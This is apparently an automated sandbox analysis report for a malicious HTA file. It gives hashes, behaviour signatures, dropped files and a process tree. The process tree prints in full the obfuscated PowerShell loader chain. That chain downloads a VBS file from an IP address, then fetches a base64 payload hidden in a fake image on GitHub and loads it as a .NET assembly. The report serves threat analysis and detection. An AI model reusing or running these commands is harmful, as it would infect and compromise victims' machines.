Overview

overview

10

Static

static

1

nicetokiss...th.hta

windows7-x64

10

nicetokiss...th.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-10-2024 14:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    nicetokissthebestthingsiwantotgetmebackwith.hta

  • Size

    130KB

  • MD5

    b581033fd1ba02c7724802d3ccda9b5b

  • SHA1

    ad4484b11cfd436200542cc8e4fbaebcb7491bf8

  • SHA256

    008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4

  • SHA512

    12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47

  • SSDEEP

    192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicetokissthebestthingsiwantotgetmebackwith.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\SysWOW64\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE
      "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:980
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:732
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s030lo1t\s030lo1t.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2AF.tmp" "c:\Users\Admin\AppData\Local\Temp\s030lo1t\CSC5172CEE6EAF4E3D8AAF69891B54891.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1460
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1776
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2808

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWERSHELl.EXE.log
    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    960f18cbaa4c2d7cf0af9a30d04a3c38

    SHA1

    d8278b8ba53c768c4bae83b49e91638e180daa99

    SHA256

    82bff83f398f6835c188ac6788745a624c097a93f75d263d2610741e2a60aea0

    SHA512

    9ea42a895ac38e82ae2d2c5b7deca81bc7d1c421ab344e04d7ca7ae38232704cbc482fa7e26d00f95032fe6e9efdf71bfc6e9abb2ccbb0d7bd3a26b74895a6b1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RESE2AF.tmp
    Filesize

    1KB

    MD5

    8617356a4d3911959c1be23dd4380c06

    SHA1

    9ea2550469c9fc181bdc97691bfdbe0c8f01fded

    SHA256

    4674b429161fddabc1ac4edb62905da681fa50ebe7fcbff11c6bc5fb56b22c9a

    SHA512

    62edfd857012b7a3029f3872d67237ab6ba82ea979a487a105e7170559cdf64f3da3c87bffa8a812e7d9bc8e75aa972b2d04ce0f7f11ef0ff7621fc905c2efa2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3d1dscy0.jxh.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\s030lo1t\s030lo1t.dll
    Filesize

    3KB

    MD5

    96152b851971585e1ac4891f55f09a85

    SHA1

    d731a13edd91d27ffc59e3952ccb50fd5faed615

    SHA256

    3e22d936819695881fc5a6ea8d71b7ac5fb187d73fb3add65ded0ec5627a9d23

    SHA512

    c5b2740e2ae5fd6a3ac7285a9034a2c1e25b5eab58cfc98932618ce09ee533b44948252984ff425c74bc2f2bcce9381f63b710f3d52f5a86fba1d4f42f6097d9

    Download Submit

  • C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS
    Filesize

    191KB

    MD5

    9a8ffc29c5835f0dae8ea49bfb6bf29d

    SHA1

    1785396f191852732bc80ab9819d03905bd9f971

    SHA256

    dd3a11a501e3394e12d7fd48ee9a58fa2aa477b059f9da5b4ff20d9c9ea84686

    SHA512

    8562ae76f5c2d41a64c01e99006e55e45a51f525b7e390b0563a5ecc48df8334b0a8b205395c93ef9c811f5ca8a04a114ae2c58eaac30fc2eaa150712096e168

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\s030lo1t\CSC5172CEE6EAF4E3D8AAF69891B54891.TMP
    Filesize

    652B

    MD5

    0e32b159c99bd147a22cac8dae881ddd

    SHA1

    6cabb746aeb40af8a840fb4f0020b41d659d6a23

    SHA256

    48ab15bedd4cedc5a140864175984b693c54ff8c4af43592466349b0e74ea07b

    SHA512

    f06b1c6a83f681b543072602990fd43d3c82aaa7c715ce10c16ab1a134b3a57cd43cadb9fee6a841f0e0b4ec6d9ba33af5307e0f5da79e419cd91f96ee455375

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\s030lo1t\s030lo1t.0.cs
    Filesize

    488B

    MD5

    3e2e82da91a6fab92b6b84593ff397e0

    SHA1

    0bbd006424668476775d6428f709ca2d1ee7f213

    SHA256

    2bb84c7913d6a90ebd0d9f5ceab30df4c4829c02c8eefd427b23a82772b0d8c6

    SHA512

    81dede5d323b38c021f3753c9372c331d9f45d3da85da125ee805365b28d340d4a67e40a31d8ed6e545e0bae86c87ba801a422831c63e78fe1febeb818983a36

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\s030lo1t\s030lo1t.cmdline
    Filesize

    369B

    MD5

    97f884eb6cb8d65ff696744bde6a5abd

    SHA1

    01d289b3b0feb716d838f67c9f304a28e7af62aa

    SHA256

    86d2f51c8532d35b9f4cea1de62bf802feef102b035618dbc31ddcb2a8955434

    SHA512

    dd5500eea4753c4a0ea3e6b461568f5d1e06dd47cf2247cb22c83264a454676015ce296d75c833f69652b73b38411cba7b9472a32463fb99a169453365a6c859

    Download Submit

  • memory/732-50-0x0000000007DA0000-0x0000000007DA8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/732-48-0x0000000007D60000-0x0000000007D74000-memory.dmp

    Filesize

    80KB

    Download

  • memory/732-49-0x0000000007E70000-0x0000000007E8A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/732-29-0x0000000007980000-0x00000000079B2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/732-30-0x000000006D690000-0x000000006D6DC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/732-40-0x0000000007960000-0x000000000797E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/732-41-0x00000000079D0000-0x0000000007A73000-memory.dmp

    Filesize

    652KB

    Download

  • memory/732-42-0x0000000008170000-0x00000000087EA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/732-43-0x0000000007B20000-0x0000000007B3A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/732-44-0x0000000007B80000-0x0000000007B8A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/732-45-0x0000000007DB0000-0x0000000007E46000-memory.dmp

    Filesize

    600KB

    Download

  • memory/732-46-0x0000000007D20000-0x0000000007D31000-memory.dmp

    Filesize

    68KB

    Download

  • memory/732-47-0x0000000007D50000-0x0000000007D5E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/980-18-0x0000000006410000-0x000000000642E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/980-19-0x0000000006450000-0x000000000649C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/980-0-0x0000000070DDE000-0x0000000070DDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/980-17-0x0000000005E20000-0x0000000006174000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/980-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/980-7-0x0000000005DB0000-0x0000000005E16000-memory.dmp

    Filesize

    408KB

    Download

  • memory/980-5-0x0000000005470000-0x0000000005492000-memory.dmp

    Filesize

    136KB

    Download

  • memory/980-4-0x0000000070DD0000-0x0000000071580000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/980-65-0x00000000069D0000-0x00000000069D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/980-71-0x0000000070DDE000-0x0000000070DDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/980-72-0x0000000070DD0000-0x0000000071580000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/980-73-0x00000000077E0000-0x0000000007802000-memory.dmp

    Filesize

    136KB

    Download

  • memory/980-74-0x00000000086F0000-0x0000000008C94000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/980-2-0x0000000070DD0000-0x0000000071580000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/980-3-0x0000000005560000-0x0000000005B88000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/980-1-0x0000000004E50000-0x0000000004E86000-memory.dmp

    Filesize

    216KB

    Download

  • memory/980-81-0x0000000070DD0000-0x0000000071580000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2572-91-0x0000000005730000-0x0000000005A84000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2808-102-0x0000000009B10000-0x0000000009F58000-memory.dmp

    Filesize

    4.3MB

    Download

  • memory/2808-103-0x00000000071B0000-0x000000000724C000-memory.dmp

    Filesize

    624KB

    Download